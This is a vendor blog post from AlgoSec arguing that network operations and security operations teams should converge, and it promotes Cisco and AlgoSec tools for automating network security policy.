    Tsippi Dach, Director of Communications at AlgoSec, explores the relationship between NetOps and SecOps and explains why they are the... DevOps The importance of bridging NetOps and SecOps in network management Tsippi Dach 2 min read Tsippi Dach Short bio about author here Lorem ipsum dolor sit amet consectetur. Vitae donec tincidunt elementum quam laoreet duis sit enim. Duis mattis velit sit leo diam. Tags Share this article 4/16/21 Published Tsippi Dach, Director of Communications at AlgoSec, explores the relationship between NetOps and SecOps and explains why they are the perfect partnership The IT landscape has changed beyond recognition in the past decade or so. The vast majority of businesses now operate largely in the cloud, which has had a notable impact on their agility and productivity. A recent survey of 1,900 IT and security professionals found that 41 percent or organizations are running more of their workloads in public clouds compared to just one-quarter in 2019. Even businesses that were not digitally mature enough to take full advantage of the cloud will have dramatically altered their strategies in order to support remote working at scale during the COVID-19 pandemic. However, with cloud innovation so high up the boardroom agenda, security is often left lagging behind, creating a vulnerability gap that businesses can little afford in the current heightened risk landscape. The same survey found the leading concern about cloud adoption was network security (58%). Managing organizations’ networks and their security should go hand-in-hand, but, as reflected in the survey, there’s no clear ownership of public cloud security. Responsibility is scattered across SecOps, NOCs and DevOps, and they don’t collaborate in a way that aligns with business interests. We know through experience that this siloed approach hurts security, so what should businesses do about it? How can they bridge the gap between NetOps and SecOps to keep their network assets secure and prevent missteps? Building a case for NetSecOps Today’s digital infrastructure demands the collaboration, perhaps even the convergence, of NetOps and SecOps in order to achieve maximum security and productivity. While the majority of businesses do have open communication channels between the two departments, there is still a large proportion of network and security teams working in isolation. This creates unnecessary friction, which can be problematic for service-based businesses that are trying to deliver the best possible end-user experience. The reality is that NetOps and SecOps share several commonalities. They are both responsible for critical aspects of a business and have to navigate constantly evolving environments, often under extremely restrictive conditions. Agility is particularly important for security teams in order for them to keep pace with emerging technologies, yet deployments are often stalled or abandoned at the implementation phase due to misconfigurations or poor execution. As enterprises continue to deploy software-defined networks and public cloud architecture, security has become even more important to the network team, which is why this convergence needs to happen sooner rather than later. We somehow need to insert the network security element into the NetOps pipeline and seamlessly make it just another step in the process. If we had a way to automatically check whether network connectivity is already enabled as part of the pre-delivery testing phase, that could, at least, save us the heartache of deploying something that will not work. Thankfully, there are tools available that can bring SecOps and NetOps closer together, such as Cisco ACI , Cisco Secure Workload and AlgoSec Security Management Solution . Cisco ACI, for instance, is a tightly coupled policy-driven solution that integrates software and hardware, allowing for greater application agility and data center automation. Cisco Secure Workload (previously known as Tetration), is a micro-segmentation and cloud workload protection platform that offers multi-cloud security based on a zero-trust model. When combined with AlgoSec, Cisco Secure Workload is able to map existing application connectivity and automatically generate and deploy security policies on different network security devices, such as ACI contract, firewalls, routers and cloud security groups. So, while Cisco Secure Workload takes care of enforcing security at each and every endpoint, AlgoSec handles network management. This is NetOps and SecOps convergence in action, allowing for 360-degree oversight of network and security controls for threat detection across entire hybrid and multi-vendor frameworks. While the utopian harmony of NetOps and SecOps may be some way off, using existing tools, processes and platforms to bridge the divide between the two departments can mitigate the ‘silo effect’ resulting in stronger, safer and more resilient operations. We recently hosted a webinar with Doug Hurd from Cisco and Henrik Skovfoged from Conscia discussing how you can bring NetOps and SecOps teams together with Cisco and AlgoSec. You can watch the recorded session here . Schedule a demo Related Articles Q1 at AlgoSec: What innovations and milestones defined our start to 2026? AlgoSec Reviews Mar 19, 2023 · 2 min read 2025 in review: What innovations and milestones defined AlgoSec’s transformative year in 2025? AlgoSec Reviews Mar 19, 2023 · 2 min read Navigating Compliance in the Cloud AlgoSec Cloud Mar 19, 2023 · 2 min read Speak to one of our experts Speak to one of our experts Work email* First name* Last name* Company* country* Select country... Short answer* By submitting this form, I accept AlgoSec's privacy policy Schedule a call

bottom of page